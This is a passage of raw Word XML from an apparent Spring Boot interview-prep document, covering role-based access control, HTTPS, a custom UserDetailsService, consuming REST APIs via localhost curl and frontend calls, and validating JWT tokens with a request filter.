        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛡</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Role-Based Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053AF86"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e @PreAuthorize or @Secured:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058193CE"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reAuthorize("hasRole('ADMIN')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FFD6F"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tMapping("/admin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A5CA0"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String adminEndpoint() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40401CAC"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Only admin can access";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698D550"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03C4E4E" w14:textId="77777777" w:rsidR="006F498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46EE122">
          <v:rect id="_x0000_i2641" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494E413" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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4. HTTPS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE694B"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force HTTPS in application.properties and generate/install SSL certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A4B85" w14:textId="77777777" w:rsidR="006F498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CBF9425">
          <v:rect id="_x0000_i2642" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D00F06" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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5. Custom UserDetailsService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD2D9F"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o fetch user credentials and roles from a database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C21CC"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681984D2"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MyUserDetailsService implements UserDetailsService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360953EA"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE519DE"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UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E15AA"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fetch user from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B32078D"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2958A289"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8603457" w14:textId="77777777" w:rsidR="006F498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CA30B28">
          <v:rect id="_x0000_i2643" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC4CDE4" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721B66F6"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curity is implemented using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2049E1FB"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 Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F2257"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JWT tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B853A5F"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ole-based access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D3564"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HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895FFDD"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Optional: OAuth2 for SSO or third-party logins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85A685"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et me know if you want code samples for JWT setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FEA84E" w14:textId="5F11E11B"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E370043">
          <v:rect id="_x0000_i2644" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A49D52" w14:textId="7F13FAB5" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="628" w:name="_Toc196308108"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>As an end user how can I consume your services</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="628"/>
    </w:p>
    <w:p w14:paraId="32404F52" w14:textId="34EC2A54" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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As an </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end user</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can consume my Spring Boot services through </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the following ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FCC36" w14:textId="77777777" w:rsidR="006F498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B4329A8">
          <v:rect id="_x0000_i2645" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA2224" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Using a REST Client (like Postman or curl):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBC6F7B"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make HTTP requests like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670DA88F"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GET request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12085EDA"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T http://localhost:8080/api/employee/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B900F"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OST request (with JSON body):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30427880"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OST http://localhost:8080/api/employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115934E"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tent-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0D1C8" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073CB336"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3EB3DD85"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name": "Siddhant",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154610AC"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designation": "Java Developer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA4E15"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0C924CEE" w14:textId="77777777" w:rsidR="006F498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AA200A0">
          <v:rect id="_x0000_i2646" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="639DFD02" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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2. From a Frontend Application (Angular/React):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00188F"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http.get("http://localhost:8080/api/employee/1").subscribe(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAEFD5"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console.log(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F7599"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99F69C4" w14:textId="77777777" w:rsidR="006F498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3FED7DC">
          <v:rect id="_x0000_i2647" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A96670" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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3. Using Command-line tools (curl):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB8F30"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url -X GET http://localhost:8080/api/employee/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040D643" w14:textId="77777777" w:rsidR="006F498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2ABF5AE">
          <v:rect id="_x0000_i2648" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3268C087" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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4. Mobile App Consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AEBC01"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Mobile apps (Android/iOS) can hit REST endpoints over HTTPS to send or fetch data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F5EB7" w14:textId="77777777" w:rsidR="006F498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9FCD745">
          <v:rect id="_x0000_i2649" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9138C5" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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5. Browser (for GET endpoints):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3BB071"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f an endpoint is GET and returns data like JSON:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC8E7B"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http://localhost:8080/api/message?user=Siddhant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4422DDB3" w14:textId="77777777" w:rsidR="006F498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3DB61B6">
          <v:rect id="_x0000_i2650" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="089FEDC7" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A71A549"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You may need to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pass Authorization headers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if JWT/OAuth2 is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DED1FC"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Use API documentation tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Swagger UI</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test and understand the API endpoints easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232AA31D"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et me know if you want a sample Swagger setup or frontend integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6218BAA7" w14:textId="25956892"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1DC9038">
          <v:rect id="_x0000_i2651" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7819FFBF" w14:textId="23435945" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="629" w:name="_Toc196308109"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to validate a token</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="629"/>
    </w:p>
    <w:p w14:paraId="5D6F4792" w14:textId="3FC4C30B" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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To </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>validate a JWT token</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application, you typically do it using a filter or a utility method that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11199F48"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tracts the token from the request header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F004E92"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arses and validates the token using the secret key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D30077"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hecks expiration, signature, and claims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5D5BB" w14:textId="77777777" w:rsidR="006F498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344FB2C">
          <v:rect id="_x0000_i2652" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5547A" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Steps to Validate a JWT Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6BB96" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Extract the Token from Authorization Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A775F94"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tring header = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A94CD"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f (header != null &amp;&amp; header.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B1C64"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tring token = header.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D10B4"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7C6AFAB" w14:textId="77777777" w:rsidR="006F498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864A5D7">
          <v:rect id="_x0000_i2653" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E0AB5" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Use a Utility Method to Validate Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FDCEEB"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boolean validateToken(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF7EF4E"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A44653"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Jwts.parser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AA076"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etSigningKey(secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5AC58F"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arseClaimsJws(token);  // Validates signature and expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1159A7A3"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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3780E3E5"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catch (JwtException | IllegalArgumentException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B38D33"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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113CC289"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFAF8D"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05FE8D64" w14:textId="77777777" w:rsidR="006F498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83B27A9">
          <v:rect id="_x0000_i2654" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1182EEA7" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Extract Username/Claims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670A2E6B"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String extractUsername(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3B017"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Jwts.parser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA72770"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etSigningKey(secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA0DFA8"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arseClaimsJws(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB1267E"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tBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E905B"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tSubject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6194D211"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254BBC4E" w14:textId="77777777" w:rsidR="006F498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06D504B">
          <v:rect id="_x0000_i2655" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583C5EA" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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JWT Token Validator Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C8A16"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create a filter that runs before every secured endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A2CEF"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A967B"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JwtRequestFilter extends OncePerRequestFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EBB55E" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9991F8"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0081A121"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JwtUtil jwtUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F24CA" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48031CE5"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78556C"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otected void doFilterInternal(HttpServletRequest request, HttpServletResponse response,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571D252"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FilterChain chain) throws ServletException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E7591"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final String authHeader = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C113D73" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6F55B2"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tring username = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76375D3C"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tring jwt = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500C341" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494F6336"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if (authHeader != null &amp;&amp; authHeader.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059DFD37"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jwt = authHeader.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907DE5B"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username = jwtUtil.extractUsername(jwt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA0573"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75DFF60C" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEF326E"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if (username != null &amp;&amp; SecurityContextHolder.getContext().getAuthentication() == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126E7A69"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if (jwtUtil.validateToken(jwt)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AB675"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UsernamePasswordAuthenticationToken token =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1675B4"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new UsernamePasswordAuthenticationToken(username, null, new ArrayList&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE5402"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ecurityContextHolder.getContext().setAuthentication(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD98D7E"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21160087"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641F0824"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chain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158849C3"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28827AE8" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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E2A5A3A" w14:textId="07D7FA01"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44EA334">
          <v:rect id="_x0000_i2656" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="700353C4" w14:textId="3A2D7035" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="630" w:name="_Toc196308110"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is native queries in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="630"/>
    </w:p>
    <w:p w14:paraId="3245DE82" w14:textId="19DC632E" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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 Spring Boot, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native queries</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refer to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
